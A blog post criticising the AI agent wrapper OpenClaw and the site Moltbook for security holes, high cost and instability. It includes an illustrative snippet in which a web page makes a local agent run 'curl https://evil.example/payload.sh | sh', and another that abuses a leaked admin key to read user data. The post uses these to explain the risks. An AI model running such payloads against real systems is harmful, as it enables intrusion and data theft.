Introduction
I have a bigger article on AI and vibecoding coming up, but I felt the need to quickly snapshot my thoughts on the current flavor-of-the-month Twitter hype product: OpenClaw (formerly MoltBot (formerly ClawdBot)).
OpenClaw brands itself as “the AI that actually does things”. What it really amounts to is a vibecoded AI CLI wrapper that is occasionally triggered automatically. During these automatic triggers, called “heartbeats”, the AI can access its “memory” (basically, markdown-formatted text files) and act on tasks you gave it during your last active conversation. That is more or less the whole magic. A ChatGPT wrapper, but with a crontab this time.
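To make that concrete, here is roughly what the pattern boils down to - a minimal sketch of my understanding, not OpenClaw’s actual code. The file names, the interval, and the callModel stub are all placeholders:

```typescript
// A minimal sketch of the "heartbeat" pattern as I understand it, NOT OpenClaw's
// actual code. File names, the interval, and callModel() are placeholders.
import { readFile } from "node:fs/promises";

// Stand-in for whatever LLM provider you would actually call.
async function callModel(prompt: string): Promise<string> {
  throw new Error("wire up your provider of choice here");
}

const MEMORY_FILES = ["memory/notes.md", "memory/tasks.md"]; // hypothetical paths

async function heartbeat(): Promise<void> {
  // "Memory" is just markdown on disk, concatenated into the prompt.
  const memory = await Promise.all(
    MEMORY_FILES.map((f) => readFile(f, "utf8").catch(() => ""))
  );
  const reply = await callModel(
    `Here is your memory:\n${memory.join("\n---\n")}\n\n` +
      `Is there anything you should do right now? If not, say "nothing to do".`
  );
  console.log(new Date().toISOString(), reply);
  // A real agent would now parse the reply and run tools or shell commands.
}

// The crontab part: poke the model every 30 minutes, whether or not you're around.
setInterval(heartbeat, 30 * 60 * 1000);
```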
Unlike most vibecoded projects, the creator, Peter Steinberger, is a well-known developer whose history precedes the concept of “vibecoding”, and the articles on his blog about his workflow are actually quite interesting to read. He doesn’t seem as obsessed with armies (or “swarms”, as we now apparently call them) of sub-agents, and seems to recognize the need for some form of validation of AI-generated code. This is what ultimately made me give OpenClaw a chance. However, my thoughts on the project aren’t quite so positive.
It’s A Cool Idea, But…
Let’s get something out of the way first. In my opinion, OpenClaw is undeniably a cool idea. I have dozens, if not hundreds, of ideas for small automations and optimizations in my life that a sufficiently smart AI should be able to take care of, given unsupervised root access to an entire cloud system. My proof of concept for this sentiment is currently none other than Claude Code. I’m using it to write small, non-critical automations that I wouldn’t have bothered to write myself otherwise.
For the sake of an example, here are a few automations that I’d love to have an AI take care of for me in the near future:
- Monitor stocks I hold, cross-check with news and proactively inform me of current events that might affect the value.
- Consolidate and summarize world- and tech-news from different sites into a configurable morning digest based on my preferences.
- Send me reminders on Discord at opportune times about anything I mentioned in passing. I don’t want to manually think about or configure these reminders for specific times; the AI should use context to derive when to notify me, and with which level of urgency.
- Manage IoT and automation scripts for my home appliances in an iterative natural language feedback loop.
- Occasionally search for new books I would enjoy based on my previous reviews and tell me about them.
And these examples are only limited by my current privacy conscience and unwillingness to give a language model sovereignty over my personal data. In a world where I didn’t have to run these requests through a cloud LLM, and could verify its output, I’d add stuff like:
- Give me periodic summaries of new e-mails and assign labels for me to review (e.g. likely to be important, likely to be spam, interesting vs. uninteresting newsletters).
- Monitor and backread specific Discord channels, inform me when interesting topics come up, or summarize how a conversation played out.
- Automatically sort a chore or event into my calendar, based on available timeslots and daily workload.
- Proactively review my system and network setup and create write-ups of possible improvements or publicly disclosed vulnerabilities.
- And about 300 more.
All that is to say that I really do believe in the concept of AI-controlled systems in the future. I think it’s incredibly cool tech and OpenClaw is certainly a very, very, very early glimpse into what could happen one day. However, in its current state…
It’s Unsafe
Vibecoding is pushing the old tech motto “move fast and break things” to the absolute extreme. Software is being created at a previously unimaginable pace, at the snap of a finger of any individual that is, at best, informed and well-intentioned, and at worst, a tech-illiterate grifter. But just as we are pushing the limits of “move fast”, we are also increasingly “breaking things”.
OpenClaw, just a few days ago, patched a serious vulnerability that allowed arbitrary remote code execution; all it took was a running OpenClaw instance and a visit to an attacker-controlled website with JavaScript enabled.
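I don’t know the exact details of the patched bug, but the general class of vulnerability looks something like this: a locally running agent exposes an unauthenticated HTTP endpoint, and any webpage you happen to visit can fire requests at it. Everything below (port, route, payload) is invented for illustration:

```typescript
// Hypothetical illustration of the *class* of bug, not the actual patched vulnerability.
// Assume a local agent listens on an unauthenticated localhost endpoint (port and
// route invented here). A malicious page can then fire a blind cross-origin request:
async function probeLocalAgent(): Promise<void> {
  try {
    await fetch("http://127.0.0.1:18789/run", {
      method: "POST",
      mode: "no-cors",                           // the attacker never needs to read the
      headers: { "Content-Type": "text/plain" }, // response, only to get the request out
      body: "curl https://evil.example/payload.sh | sh",
    });
  } catch {
    // no local agent listening on this machine; move on to the next visitor
  }
}
probeLocalAgent();
```

The mitigations for this class of problem are boring and well understood: binding to localhost is not enough, anything an agent exposes over HTTP also needs authentication and origin checks.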
The creator of Moltbook, the viral social media platform for AI agents, loudly exclaimed on Twitter that he “didn’t write one line of code for @moltbook. I just had a vision for the technical architecture and AI made it a reality.” Sounds very utopian. I commend him for keeping that post up even after security researchers, within minutes of inspecting the website, noticed that an admin-level access key to the core database was publicly embedded in the frontend code - leaking emails, full names, and API keys of thousands of users, and allowing anyone to manipulate the content and metadata of any post on the platform!
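For those who haven’t seen this particular failure mode before, the anti-pattern is shipping a privileged credential inside the client bundle. I don’t know what Moltbook actually runs on, so the snippet below uses a Supabase-style client and made-up table names purely to illustrate why this is game over:

```typescript
// Reconstruction of the anti-pattern, not Moltbook's actual code. The client library,
// table names, and key are stand-ins; the point is that a privileged key compiled into
// frontend JavaScript is readable by every visitor with devtools open.
import { createClient } from "@supabase/supabase-js";

// This string ends up verbatim in the minified bundle served to every browser.
const db = createClient("https://example-project.supabase.co", "ADMIN_LEVEL_SERVICE_KEY");

// Anyone who copies that key out of the bundle can now do exactly what the app can:
const { data: users } = await db.from("users").select("email, full_name, api_key");
await db.from("posts").update({ body: "buy my coin" }).eq("id", 1);
```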
These breaches are very, very serious. And yes, they happen in “handcrafted” software as well. However, a combination of developer awareness and smart library restrictions has diminished these risks quite substantially over the past decade or so. In contrast, AI will, in my experience, often take shortcuts to achieve the “minimum viable prototype” - except the minimum viable prototype now seems to be a marketable product to hype up millions of potential users on social media while exposing them to vulnerabilities on a scale that hasn’t really been observed since the early 2000s. It’s like computer security now has its own little antivaxx movement.
It’s Expensive
Let’s ignore all the critical security flaws for a second. OpenClaw is also PROHIBITIVELY expensive. For all of Peter Steinberger’s accolades, he doesn’t seem to be immune to the honestly somewhat psychotic and self-absorbed idea that a foundation model can be aligned if you just give it hundreds of thousands of lines of instructions spread across markdown files with important-sounding names like “SOUL.md”. This, combined with no obvious attempt to condense context across long conversations, can lead to nasty surprises, like suddenly realizing you are paying $1 per message sent to Claude Opus. As we’ve discussed, the app also triggers periodic “heartbeats” even when you’re not actively chatting with it - which are just more model calls, and often conclude with nothing more than “nothing to do”.
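To put a rough number on that: the cost per message is basically the context you re-send every turn times the price per input token, and giant instruction files plus an uncompacted conversation inflate the first factor enormously. The per-token prices and context sizes below are placeholders in the ballpark of frontier-model pricing, not anyone’s actual rate card:

```typescript
// Back-of-the-envelope math. The per-token prices are placeholders roughly in the
// ballpark of frontier-model pricing; plug in your provider's actual rates.
const INPUT_PRICE = 15 / 1_000_000;  // $ per input token  (assumed)
const OUTPUT_PRICE = 75 / 1_000_000; // $ per output token (assumed)

// An agent that re-sends every markdown "memory" file plus the whole conversation
// history on every turn can easily drag 60k tokens of context along with it.
const contextTokens = 60_000;
const outputTokens = 1_000;

const perMessage = contextTokens * INPUT_PRICE + outputTokens * OUTPUT_PRICE;
console.log(`~$${perMessage.toFixed(2)} per message`); // ~$0.98

// Now add a heartbeat every 30 minutes that does the same work just to conclude
// "nothing to do": 48 extra calls a day before you have typed a single word.
console.log(`~$${(perMessage * 48).toFixed(0)} per idle day`); // ~$47
```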
In about 30 minutes of using Claude Opus through OpenClaw, I’d burned through most of my $6 in free Anthropic credit from last year. “Well”, you might say, “just don’t use Opus”. And, I mean, I guess? It is true that you can significantly cut costs by being smart about your model usage. However, the effectiveness of OpenClaw as a whole dramatically decreases with less capable base models. I signed up for a one-month subscription to Synthetic.new, a very cost-effective service for querying large open source models. Using Synthetic, I tried GLM 4.7, Kimi K2.5, and DeepSeek V3.2 as base models, with very sobering results. Opus 4.5 does have a little bit of magic to it, but it’s very expensive magic. I don’t personally buy the argument that performance differences between foundation models are not discernible. Seems a little bit like the “human eyes can’t see more than 30 FPS” debate to me.
And what exactly is the value proposition if you’re not using Opus? I have a Claude subscription; it costs me $20 a month. With those $20 I can pester Opus a lot. Certainly more than a single 40-turn conversation. I see the vision in using Opus to set up and deploy elaborate task managers, reminder systems, tools and scripts unsupervised. I don’t really see the vision in spending two hours trying to rein in a weaker base model to deploy a tool that I could have deployed myself in 30 minutes using Claude Code. It feels like OpenClaw, in this instance, acts mostly as an interface to compensate for someone’s lack of experience in software development, by pseudo-automating deployment and providing a familiar chat interface like Discord or Telegram instead of a CLI.
Supposedly OpenAI is taking a different stance than Anthropic on hijacking the OAuth token from their subscription service; Anthropic has been indiscriminately banning users who abuse the subscription for wrappers outside of Claude Code. In a world where I didn’t have any of my other criticisms, that might be a reasonable avenue for reining in costs. Again, it’s not like I don’t believe in the vision. It’s just that the current implementation doesn’t manifest that vision at all. Unless you have a significant sum of cash to burn and basically no technical experience, there is just nothing here that can’t be re-implemented by yapping with Claude Code for 15 minutes at a fraction of the cost.
It’s Unstable
Let’s ignore the critical security flaws AND the cost for a second. For me, the value in vibecoded software is that it is manifested out of thin air and custom tailored to solve a specific problem I have, at the cost of extensibility, maintainability and security. This idea goes out the window when you use someone else’s vibecoded software. It’s still just as unmaintainable, still just as unsafe. But now you also have no direct connection to the problem it is trying to solve, and no idea what the premise for generating the software even was (i.e. what ideas, thoughts, or prompts went into creating it).
This new social-media-driven phenomenon of “presenting” vibecoded software as a “product” to potential “customers”, to me, mirrors the same vaporware peddling seen in AI-generated art, music, or text (“I asked ChatGPT to…”). It may well hold value to you as the creator (although more often than not, that value is just the chance to get away with a quick cash grab), but the value to others is proportional to the effort it took to create it. There is no value in telling me what ChatGPT told you; I can ask it myself. There is no value to your AI-generated image, song, or video; I can generate it myself if I wanted to, and in the process customize it to my own preferences. This is true regardless of your stance on AI-generated media. If it’s trivial for anyone to do, there is no value proposition in publishing it for others to consume. Similarly, even if I wanted to use vibecoded software, if the generation process consists of yapping at Claude Code for five minutes, why wouldn’t I just make my own version - one that I understand and that is built to my own standards and specifications?
When using OpenClaw, I frequently ran into issues. The bot wouldn’t post in specific Discord channels. It would not respond with a message after tool calls. It would crash entirely at times, and just launching the CLI command openclaw takes more than three full seconds (which is insanity, by the way).
The repository for OpenClaw currently has over 1,300 open issues, 375,000 lines of code, 180,000 lines of tests, and more than one hundred thousand lines of documentation in the docs/ folder.
Let me repeat this.
The OpenClaw code repository currently contains more than one hundred thousand lines of text documentation. In fairness, half of it is a full Mandarin version of the docs, for some reason. Still, there are over two hundred thirty thousand words in the English documentation alone. In other words, the documentation of OpenClaw is currently rapidly approaching the combined length of the first three Harry Potter books.
The mere implication that any single human or small team of developers understands this documentation, or has ever even read it, let alone kept it up to date across the (currently) eight thousand commits, is preposterous. In fact, if you want an anecdotal example of how developers typically treat AI-generated documentation: a few days ago on HackerNews, someone showed off their project, ironically a container wrapper for OpenClaw (yeah, a container for my CLI wrapper for my API to query my LLM). The AI-generated documentation was so bad that not even the quick-start command was correct. The model hallucinated that the project belonged to Anthropic itself, and made up a plausible-sounding project name in the process. In other words, most AI-generated “documentation” is just drivel that probably ends up poisoning the model’s context more than anything else. Now imagine that example blown up a thousand times. No wonder it doesn’t work.
So what am I to do when an actual issue with such a product arises in my daily use? Nothing. There is nothing I, as a standalone developer, can really do at that point, other than let loose another rabid AI agent to take a sledgehammer to some code at random and hope it solves my problem - which is probably what a not insignificant portion of the 1,300 active GitHub issues consist of. Again, we are talking about an LLM wrapper with a crontab and a few social media channel integrations that more or less sometimes work. What are we doing here?
It’s Irresponsible
So maybe, let’s no longer ignore the critical security flaws, the cost, and the general instability of these projects. OpenClaw follows an increasingly long track record of vibecoded software that enables developers to forego longstanding software standards by shirking responsibility onto a statistical text generation model. As a famous IBM training manual put it:
A computer can never be held accountable. Therefore a computer must never make a management decision.
In my opinion, people like Peter Steinberger and Matt Schlicht are directly and solely responsible for compromising thousands of machines and tens of thousands of rows of personal information, and that’s before you even consider novel attack vectors like prompt injection that developers of software based on language models simply must be aware of.
Throwing together a website in an afternoon that compromises your userbase, without at least performing a manual security review, is not cutesy. It’s not a fun little thing you made. It’s negligent. You cannot shirk responsibility for these predictable outcomes - not onto your users, and not onto your text model. More and more frequently, I see creators of vibecoded software defending their bad architectural decisions by saying “it’s just a little thing I made, I didn’t mean for it to be good”. To me, that argument goes out the window as soon as you publish your project for anyone to use and proudly market it as “the app I made”. In the past, these shoddily created weekend projects would have terrible UI/UX, scaring tech-illiterate users off. They probably wouldn’t even have a frontend to begin with. The colorful websites and grandiose presentations that used to signal high-quality software should not be used to bait unaware users into trusting your project, only to fall back on their “better judgment” when things predictably go awry.
I never considered computer programming to be much of an art form. After recent events, I am beginning to reconsider. I know the prospect of new tech is exciting for developers, and everyone wants to play with the cool new toy. But it’s not cool to sell empty promises to people who don’t know any better. It’s unfortunately so 2026-coded that something like Moltbook is a vibecoded, unsafe slop factory that, within one week, was overrun by people trying to shill crypto, producing landfills’ worth of text that nobody has ever read nor ever will - instead of the admittedly cool experiment of having a thousand small, privileged, personalized and sandboxed agents communicate, learn about each other, and carve out their own little virtual domain.
As a software developer by passion, I hope we can be better than this.